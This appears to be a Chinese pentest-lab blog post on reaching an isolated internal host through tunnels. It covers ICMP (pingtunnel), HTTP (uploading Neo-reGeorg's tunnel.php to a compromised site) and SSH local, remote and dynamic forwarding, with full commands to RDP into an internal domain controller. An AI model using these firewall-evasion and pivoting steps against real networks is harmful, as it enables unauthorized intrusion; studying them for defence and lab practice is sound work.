昨天讲了通过代理的形式(端口转发)实现了上线不出网的机器,那么今天就来讲一下如何通过隧道上线不出网机器
目录
1.网络拓扑
2.开始做隧道?No!!!
3.icmp隧道
4.HTTP隧道
5.SSH隧道
1.什么是ssh隧道
2.ssh隧道:端口转发
3.SSH远程端口转发
4.ssh动态端口转发
1.网络拓扑
今天我youyouyouyouyoyoyo又配环境配到崩溃了,是的,配环境已经给我整麻了(kali的网卡那里感觉有点问题,怎么配都配不好)所以我知难而退,改换桥接!!
大概是这样的一个网络拓扑
2.开始做隧道?No!!!
第一部肯定不是做隧道啊!,你连防火墙给你通过什么流量都不知道,做啥隧道,做了流量也过不去,所以!!正确的第一步,是通过对应的流量探测去制定隧道的种类!!!
3.icmp隧道
所谓的icmp隧道就是:将数据包夹带在icmp的数据包中,其中,ICMP 隧道几乎在所有的网络环境中都是被允许的,因此攻击者可以通过 ICMP 隧道绕过一些网络安全设备。
但是!!!这个程序似乎在一些低版本的Windows上运行不了(缺少一些系统动态链接库文件)
虽然win11可以(但是很多内网的环境都是用的win7 winserver这种的)所以适用范围较窄感觉
即便是这样,那也还是要将草走复现一下的!😭😭😭
先是kali上的命令
sysctl -w net.ipv4.icmp_echo_ignore_all=1 //用于禁用本机对icmp流量的应答
然后再win7靶机上运行
pingtunnel.exe -type server -noprint 1 -nolog 1
然后kali上运行以下命令,意思就是将本机的8888作为scok5的连接端接口
bash pingtunnel -type client -l:8888 192.168.3.58 -sock5 1
最后就在kali上修改一个配置文件
vim /etc/proxychain4.conf //并且在底部添加一行socks5 127.0.0.1 8888 即可
就可以远程连接了
proxychains rdesktop 192.168.52.138
4.HTTP隧道
这个比较常见,我们经常都是通过一个web漏洞去getshell的,所以防火墙一般不会限制http流量
HTTP隧道有特别特别多,今天来分享一个加密隧道穿透 Neoreg-reGeorg
下载连接 :项目概览 - Neo-reGeorg - GitCode
开整,先再摆一下网络拓扑,以免忘记
先在kali上运行,k后面可以跟上你自己的密码
python neoreg.py -k "你的密码"
然后判断网站的语言,我这个win7上搭建的是php的网站
我们在执行完kali的命令之后会生成一个文件夹
--->
选择对应的网站语言扔上去 (我这里扔的是tunnel.php)可以看见能成功访问
于是就在kali上执行这个命令,意思就是开本地的8888端口来连接远程的php文件
python neoreg.py -k "你的密码" -u http://192.168.3.58/tunnel.php -p 8888
这就可以了???,肯定不是啊,你还没开socks5的本地代理端口,咳咳咳,差点忘记说了
这个工具建立的是socks5代理,所以你就开启对应的代理端口
vim /ect/proxychains4.conf
在这个文件的最底端加上这个指令 socks5 127.0.0.1 8888
然后就可以连接啦!!!!
proxychains rdesktop 192.168.52.138 //这个可以直接写内网的地址!!!
这样就能成功连接上去了!!!!嘿嘿嘿
当然了,http隧道可不止这一种,tunna abptts pivotnaacci 这些都是http的隧道,就不多枚举了
5.SSH隧道
众所周知,在实战中一般服务器都是的Linux_like的,于是小编就去下载了一个Ubuntu来玩一下
是时候该更新网络拓扑啦
于是这样我们就有了一台新的Linux服务器,可以搞事情了
直接访问它的网站根目录下的文件hhhh~~~
1.什么是ssh隧道
在实际中,大部分的Linux服务器都支持ssh协议,内网中的主机和设备以及边界的防火墙都允许ssh流量通过,但是!!!ssh除了可以远程连接,还可以转发流量,并且是加密转发,进而突破防火墙限制
2.ssh隧道:端口转发
首先确定Ubuntu的22端口开放,以及知道它的账号密码 ,就可以在kali进行以下操作
ssh -L 8887 192.168.52.138:3389 whoami@192.168.3.61 -p 22
这个的意思就是
- kali先通过连接Ubuntu服务器
- 又因为Ubuntu可以和内网通信, -L 意思为将靶机的3389端口的流量准发到攻击机的8887端口
- 当kali访问本地的8887就等于在访问内网DC的3389端口
这样就可以同时连接上两台服务器!!!
3.SSH远程端口转发
这个和本地端口转发有点类似不过要先获取它的root权限,这个Linux不用于Linux
蚁剑是无法执行ssh的,而且上线cs有点困难我不会,于是就要在ubuntu上面敲这个代码
ssh -R 8887:192.168.52.138:3389 kali@192.168.3.57 -p 22
前提是你的攻击机器kali开启22端口!!可以这样查看
sudo systemctl status ssh
没开启的话开启就好
sudo systemctl start ssh
然后在你的Ubuntu上面输入kali的密码就能成功连接了
但是,在你连接上了内网DC的时候,Ubuntu也是连接上了你的kali
如果你的虚拟机配置不当,或者说别的大佬有0day,是可以造成虚拟机越狱的,那到时候你就惨了
4.ssh动态端口转发
所谓的动态端口转发就是建立起一个ssh加密的socks4/5的代理隧道,我们需要在kali运行以下命令
ssh -D 8888 whoami@192.168.3.61
然后就能连接上Ubuntu了,其中的 -D意为建立socks5隧道流量走8888端口,去连接ubutu的22端口
当然了,以上能成功,是在socks5代理成功配置的情况下噢
满足上述条件,就能实现内网穿透了,远程上线成功!!!!
以上,就是多种的协议对应的一些隧道!!当然还有很多,像DNS ,RDP ,IPV6都是有对应隧道的,这里我就不枚举了!!
明天讲什么呢?? 讲隧道穿透利用方法, 多层代理,反正向代理,多级代理,节点加密,节点穿透,对应工具部署!!!! Byd我都期待起来了!!